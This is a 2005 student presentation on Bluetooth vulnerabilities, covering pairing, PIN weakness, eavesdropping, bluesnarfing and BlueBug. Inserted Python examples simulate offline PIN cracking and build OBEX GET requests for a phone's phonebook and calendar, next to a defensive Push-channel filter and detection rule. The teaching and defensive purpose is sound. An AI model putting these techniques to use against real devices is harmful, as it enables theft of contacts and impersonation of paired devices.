Bluetooth Vulnerabilities

Bluetooth Vulnerabilities - Presentation Transcript

  1. Bluetooth Vulnerabilities
     ECE 478, Winter 05
     Victor Yee
  2. Topics
     • What is Bluetooth?
     • History
     • SIG
     • Modes
     • Address
     • Pairing
     • Eavesdropping
     • Impersonation
     • Cipher Vulnerabilities
     • Bluejacking
     • Bluesnarfing
     • Bluetooone
     • Bluesniper
  3. What is Bluetooth?
     • A way to connect wirelessly to
       – Wireless headsets
       – Handhelds
       – Personal computers
       – Printers
       – Mobile phones
       – Digital cameras
       – GPS receivers
       – Digital pens
       – Automobiles
  4. What is Bluetooth?
     • Short-range (10 m to 100 m, depending on the device's power class) wireless specification
     • Operates in the 2.4 GHz ISM radio band
     • A single radio (the piconet master) can maintain up to 7 simultaneous active connections
     • Gross data rate of 1 Mb/s (Basic Rate), up to 3 Mb/s with Enhanced Data Rate (2.0+EDR)
  5. History
     • Named after the 10th-century Danish king Harald Bluetooth (Harald Blåtand), who was instrumental in uniting warring tribes in what is now Denmark and Norway
     • The logo, designed by a Scandinavian firm, combines the runic characters for H and B
  6. SIG
     • Bluetooth Special Interest Group: a privately held trade association made up of leading companies from
       • Telecom
       • Computing
       • Automotive
       • Industrial automation
       • Network industries
     • The SIG markets the technology and advances its development
  7. Bluetooth Protocol Stack
     • L2CAP - Logical Link Control and Adaptation Protocol (multiplexes higher-layer protocols over the baseband link)
     • OBEX - Object Exchange protocol (originally IrDA's generalized multi-transport object exchange; carries business cards and files, runs over RFCOMM)
     • RFCOMM - Serial port emulation over L2CAP
     • SDP - Service Discovery Protocol
     • TCS - Telephony Control protocol Specification
  8. Modes
     • Bluetooth devices can be in different modes
       – Discoverable
         • The device answers inquiries, so it can be found by others searching in range
       – Connectable
         • The device responds to connection requests and messages from other devices
       – Non-Discoverable
         • Hidden from inquiry only; a device whose address is already known, or guessed, can still be connected to
       – Non-Connectable
  9. Address
     • Bluetooth device address (BD_ADDR): a 48-bit unique identifier, like an Ethernet MAC, used for all communication
       – The Device Access Code (DAC), derived from the target device's address, is used to address that device (for example when paging it)
       – The Channel Access Code (CAC), derived from the piconet master's address, identifies the channel and prefixes every packet
       – DAC and CAC
         • Determined by the device address (its lower 24 bits)
         • Never encrypted, so anyone sniffing the band sees them
  10. Address
     • Because the address is unique and sent in the clear, it can be used to track and monitor the behavior of the user
     • Logs of seen addresses are a violation of privacy
  11. Security Modes
     • Mode 1 – No security
     • Mode 2 – Service-level enforced security: the application or service decides, after the L2CAP channel is set up
     • Mode 3 – Link-level enforced security, applied before the channel is established
       • PIN-based authentication
       • Address-based security
       • Encryption
  12. Security Modes
     • Difference between Mode 2 and Mode 3: in Mode 3 the Bluetooth device initiates security procedures before the channel is established, whereas in Mode 2 they can only start after it is
  13. Security Modes
     • Different security levels for devices and for services
       – Devices (2 levels)
         • Trusted device – unrestricted access to all services
         • Untrusted device
       – Services (3 levels)
         • Require authorization and authentication
         • Require authentication only
         • Open to all devices
  14. How does Pairing Work?
     • Two Bluetooth devices must pair before data can be exchanged
     • A PIN (numeric digits 0-9 on most devices, up to 16 octets long) is entered on, or fixed in, both devices
     • One device sends a 128-bit random number (IN_RAND) to the other, in the clear
     • Both devices compute the initialization key as a function (E22) of the shared PIN, the Bluetooth device address of the device that received the random number, and the random number
  15. PIN
     • 0000 is the default on many devices – by the slide's count, 50% of PINs in use are 0000 (laziness)
     • 4 digits – only 10,000 possibilities
  16. Verification
     • The first device sends a random challenge (AU_RAND); the other device computes a response from the key, its own address and the challenge, and sends that computed value back
     • The first device compares the received value with its own computation; if they are the same, the other device is authenticated
     • Then the roles switch, so authentication is mutual
  17. Eavesdropping
     • An attacker listens to messages or data exchanged between devices
       – No application-layer encryption: if link encryption is off, everything is readable
       – Middle-person (man-in-the-middle) attack
     • Voice data between phone and headset
     • Credit card information (Internet purchases)
     • Having recorded a pairing, the attacker exhaustively guesses every PIN up to a certain length offline: the random numbers and responses were sent in the clear, so only the PIN is unknown
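The following is an added example, not code from the presentation or from any Bluetooth stack. It plays out slides 14-17 end to end: the IN_RAND / challenge-response exchange, what a sniffer captures, and the offline PIN search that capture allows. The real Bluetooth functions E22 (initialization key) and E1 (authentication) are built on the SAFER+ block cipher; an HMAC-SHA256 stand-in is used here with the same inputs, which keeps the message flow and the attacker's view identical while staying readable. The addresses, PIN and random values are constructed for the demo. (The real protocol also derives a combination link key with E21 before authentication; an attacker replays that step the same way, so it is omitted here.)

```python
import hashlib
import hmac
import os

# Constructed demo addresses (not real devices).
ADDR_A = bytes.fromhex("001122334455")   # device that generates IN_RAND
ADDR_B = bytes.fromhex("66778899aabb")   # device that receives IN_RAND


def e22(pin: bytes, bd_addr: bytes, in_rand: bytes) -> bytes:
    """Stand-in for E22: K_init from the PIN, the address of the device that
    received IN_RAND, and IN_RAND. Real E22 is SAFER+ based; HMAC-SHA256 is an
    assumption made for this demo and keeps the same inputs."""
    return hmac.new(pin + bd_addr, in_rand, hashlib.sha256).digest()[:16]


def e1(key: bytes, claimant_addr: bytes, au_rand: bytes) -> bytes:
    """Stand-in for E1: 32-bit SRES from the key, the claimant's address and
    the 128-bit challenge AU_RAND."""
    return hmac.new(key, claimant_addr + au_rand, hashlib.sha256).digest()[:4]


def pair_and_authenticate(pin: bytes, rng=os.urandom):
    """Slides 14-16: A sends IN_RAND, both derive K_init, A challenges B, then
    the roles switch. Returns (success, transcript); the transcript is exactly
    what a sniffer in range captures: addresses, random values and responses,
    never the PIN or the key."""
    in_rand = rng(16)                          # A -> B, in the clear
    k_init_a = e22(pin, ADDR_B, in_rand)       # A uses B's address (B received IN_RAND)
    k_init_b = e22(pin, ADDR_B, in_rand)       # B computes the same value

    au_rand_1 = rng(16)                        # A -> B challenge
    sres_b = e1(k_init_b, ADDR_B, au_rand_1)   # B -> A response
    b_ok = hmac.compare_digest(sres_b, e1(k_init_a, ADDR_B, au_rand_1))

    au_rand_2 = rng(16)                        # roles switch: B -> A challenge
    sres_a = e1(k_init_a, ADDR_A, au_rand_2)   # A -> B response
    a_ok = hmac.compare_digest(sres_a, e1(k_init_b, ADDR_A, au_rand_2))

    transcript = {"addr_a": ADDR_A, "addr_b": ADDR_B, "in_rand": in_rand,
                  "au_rand": au_rand_1, "sres": sres_b}
    return b_ok and a_ok, transcript


def crack_pin(transcript: dict, max_digits: int = 4):
    """Slide 17: offline exhaustive search over every numeric PIN up to
    max_digits, re-running the key derivation against the captured values.
    Shortest PINs are tried first, so the default 0000 falls almost at once."""
    t = transcript
    for n in range(1, max_digits + 1):
        for i in range(10 ** n):
            guess = str(i).zfill(n).encode()
            k = e22(guess, t["addr_b"], t["in_rand"])
            if e1(k, t["addr_b"], t["au_rand"]) == t["sres"]:
                return guess.decode()
    return None


def impersonate(pin: bytes, transcript: dict, au_rand: bytes) -> bytes:
    """Slide 18: with the recovered PIN the attacker derives the same key and
    can answer any fresh challenge as device B."""
    k = e22(pin, transcript["addr_b"], transcript["in_rand"])
    return e1(k, transcript["addr_b"], au_rand)


if __name__ == "__main__":
    ok, captured = pair_and_authenticate(b"1234")
    print("pairing succeeded:", ok)
    recovered = crack_pin(captured)
    print("recovered PIN from sniffed transcript:", recovered)
    forged = impersonate(recovered.encode(), captured, captured["au_rand"])
    print("forged response matches the real one:", forged == captured["sres"])
```

A 4-digit search is 11,110 key derivations; with a 16-octet random PIN, as the Protection slide recommends, the same search space is 2^128 and the recorded transcript is useless.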
  18. Impersonation
     • If the PIN is known, the attacker can compute the key and impersonate either device
       – Alter e-mail responses (Internet access through the phone)
       – Alter data to be printed (printer)
  19. Cipher Vulnerabilities
     • The 128-bit key of the E0 stream cipher can be broken with about 2^64 work (Jakobsson, Security Weaknesses in Bluetooth)
     • Divide-and-conquer attacks are not practical against the deployed protocol
       – They need access to the key stream over long periods
       – Bluetooth resynchronizes E0 for every packet (a high resynchronization frequency), so the key stream is short
  20. Bluejacking
     • Sending anonymous messages to another device without its owner's approval or authorization, usually as the name field of a business card pushed over OBEX
     • Example – a tourist admiring Swedish handicrafts in a storefront window hears her cell phone chirp with an anonymous note: "Try the blue sweaters. They keep you warm in the winter." The tourist has no idea who the sender is.
  21. Bluesnarfing
     • "Snarf" is network slang for an unauthorized copy
     • Theft of data: calendar information, phonebook contacts, the phone's IMEI
       – A stolen IMEI can be used for cloning a phone
     • The attacker establishes the connection without any confirmation on the victim's phone
     • Vulnerable cell phones are open to privacy invasion
     • The tools, and the vulnerable phones, can be purchased on the Internet
     • Attackers exploit a flaw in the phone's OBEX implementation through the OBEX Push channel: the channel that exists to accept an incoming business card (PUT) also answers GET requests for known file names such as the phonebook, without pairing (Laurie, Bluetooth Hacking – Full Disclosure)
  22. BlueBug
     • Based on AT commands (the Hayes-style modem command set that phones expose)
     • Gives the attacker a high level of control over the mobile phone
       – Phone calls
       – Text messages (SMS)
       – Phonebook entries (reading and writing)
       – Call forwarding
     • Flaw: a hidden RFCOMM channel
       – Not announced over the Service Discovery Protocol (SDP), so a scan of every RFCOMM channel finds it while SDP does not
       – RFCOMM provides emulation of serial ports over L2CAP; the AT command interpreter sits behind one of those ports
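An added example, not code from the presentation or from trifinite.org's tools, showing the OBEX traffic behind bluesnarfing and the server-side check that defeats it. It builds the CONNECT and GET packets a probe sends over the Push channel, decodes OBEX packets, and implements a Push-channel policy that rejects anything but PUT, since that is all the Push service legitimately needs. Opcodes and header layouts follow the OBEX specification; the phonebook file names come from Laurie's disclosure; the "vulnerable phone" reply is constructed for the demo.

```python
import struct

# OBEX opcodes (0x80 = final-packet bit), response codes and header identifiers.
OP_CONNECT, OP_DISCONNECT, OP_PUT, OP_GET, OP_SETPATH, OP_ABORT = 0x80, 0x81, 0x02, 0x03, 0x85, 0xFF
FINAL = 0x80
RSP_SUCCESS, RSP_FORBIDDEN = 0xA0, 0xC3
HDR_NAME, HDR_TYPE, HDR_BODY, HDR_END_OF_BODY = 0x01, 0x42, 0x48, 0x49

# Objects a bluesnarf probe requests by name over the Push channel.
SNARF_TARGETS = ["telecom/pb.vcf", "telecom/cal.vcs"]


def _hdr(hi: int, data: bytes) -> bytes:
    """Unicode (0x0?) and byte-sequence (0x4?) headers: HI, 2-byte big-endian
    length that includes the 3-byte prefix, then the data."""
    return struct.pack(">BH", hi, 3 + len(data)) + data


def hdr_name(name: str) -> bytes:
    """Name header: UTF-16BE, null terminated."""
    return _hdr(HDR_NAME, name.encode("utf-16-be") + b"\x00\x00")


def packet(opcode: int, payload: bytes = b"") -> bytes:
    """OBEX packet: opcode, 2-byte total length, headers."""
    return struct.pack(">BH", opcode, 3 + len(payload)) + payload


def connect_request(max_packet: int = 0x2000) -> bytes:
    """OBEX CONNECT: version 1.0, flags 0, maximum packet length."""
    return packet(OP_CONNECT, struct.pack(">BBH", 0x10, 0x00, max_packet))


def get_request(name: str, mime: str = "text/x-vcard") -> bytes:
    """What a snarf probe sends after CONNECT: GET <name> on the Push channel."""
    return packet(OP_GET | FINAL, hdr_name(name) + _hdr(HDR_TYPE, mime.encode() + b"\x00"))


def put_request(name: str, body: bytes) -> bytes:
    """A legitimate Push: a business card delivered with PUT."""
    return packet(OP_PUT | FINAL, hdr_name(name) + _hdr(HDR_END_OF_BODY, body))


def parse_packet(buf: bytes, connect_response: bool = False):
    """Decode one OBEX packet into (opcode, [(HI, value), ...]). CONNECT
    requests and responses carry 4 extra bytes before the headers."""
    opcode, length = struct.unpack(">BH", buf[:3])
    if length != len(buf):
        raise ValueError("OBEX length field does not match packet size")
    pos = 7 if (opcode == OP_CONNECT or connect_response) else 3
    headers = []
    while pos < length:
        hi = buf[pos]
        kind = hi >> 6                      # top two bits give the value format
        if kind in (0, 1):                  # 0: UTF-16BE string, 1: byte sequence
            hlen = struct.unpack(">H", buf[pos + 1:pos + 3])[0]
            value, pos = buf[pos + 3:pos + hlen], pos + hlen
        elif kind == 2:                     # single byte
            value, pos = buf[pos + 1:pos + 2], pos + 2
        else:                               # four bytes
            value, pos = buf[pos + 1:pos + 5], pos + 5
        if kind == 0:
            value = value.decode("utf-16-be").rstrip("\x00")
        headers.append((hi, value))
    return opcode, headers


def push_channel_policy(request: bytes):
    """Hardened OBEX Push server: CONNECT, DISCONNECT, PUT and ABORT are all the
    Push profile needs. A GET or SETPATH here is the bluesnarf signature and is
    answered with FORBIDDEN. Returns (allowed, response, requested names)."""
    opcode, headers = parse_packet(request)
    names = [v for hi, v in headers if hi == HDR_NAME]
    base = opcode & ~FINAL
    if base in (OP_CONNECT & ~FINAL, OP_DISCONNECT & ~FINAL, OP_PUT, OP_ABORT & ~FINAL):
        return True, packet(RSP_SUCCESS), names
    return False, packet(RSP_FORBIDDEN), names


def extract_body(response: bytes) -> bytes:
    """Join Body / End-of-Body headers of a successful GET: what the attacker
    actually walks away with from a phone that lacks the check above."""
    opcode, headers = parse_packet(response)
    if opcode != RSP_SUCCESS:
        return b""
    return b"".join(v for hi, v in headers if hi in (HDR_BODY, HDR_END_OF_BODY))


# Constructed reply from a phone with the flaw: the phonebook handed back to a GET.
VULNERABLE_PHONE_REPLY = packet(RSP_SUCCESS, _hdr(HDR_END_OF_BODY, b"BEGIN:VCARD\r\nFN:Alice\r\nEND:VCARD\r\n"))

if __name__ == "__main__":
    for target in SNARF_TARGETS:
        allowed, rsp, names = push_channel_policy(get_request(target))
        print(f"GET {names[0]}: allowed={allowed} response=0x{rsp[0]:02x}")
    print("vulnerable phone returned:", extract_body(VULNERABLE_PHONE_REPLY).decode().strip())
```

The same opcode test is the detection rule for a Bluetooth monitor: a GET or SETPATH opcode arriving on the Push channel (RFCOMM channel advertised by SDP as OBEX Object Push) has no legitimate sender.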
  23. Bluetooone
     • Increasing the range by attaching a directional antenna to an ordinary Bluetooth dongle
     • Enables long-range attacks
     • Not limited to the nominal 100 m distance
  24. Bluesniper
     • Rifle-mounted directional antenna; tested at 1.1 miles in 2004
  25. Other Flaws
     • Battery-draining denial of service attack
       – Occupies the channel
       – Drains the battery through continuous scanning and responding
  26. Protection?
     • Turn off Bluetooth when not in use
     • Set the device to non-discoverable (this hides it from inquiry only; a known address can still be connected to)
     • Choose random PINs, as long as the devices allow (up to 16 octets), never the default 0000
     • Do not transmit confidential or sensitive information over Bluetooth
  27. Sources
     • Bluetooth.com
     • Bluetooth.org
     • Bluetooth Protocol Stack. thewirelessdirectory.com
     • Ellie, Jelly (2004). Why 'bluejacking'? Bluejackq.com
     • Jakobsson, Markus. Security Weaknesses in Bluetooth. Lucent Technologies.
     • Laurie, Adam (2003). Bluetooth Hacking – Full Disclosure. trifinite.org
     • Laurie, Ben (2004). Bluetooth Security Briefs. thebunker.net
     • Vainio, Juha (2000). Bluetooth Security. Helsinki University of Technology.
     • Whitehouse, Ollie (2003). War Nibbling: Bluetooth Insecurity. @stake Research Report.

Uploaded by VictorYee, 2 years ago

© All Rights Reserved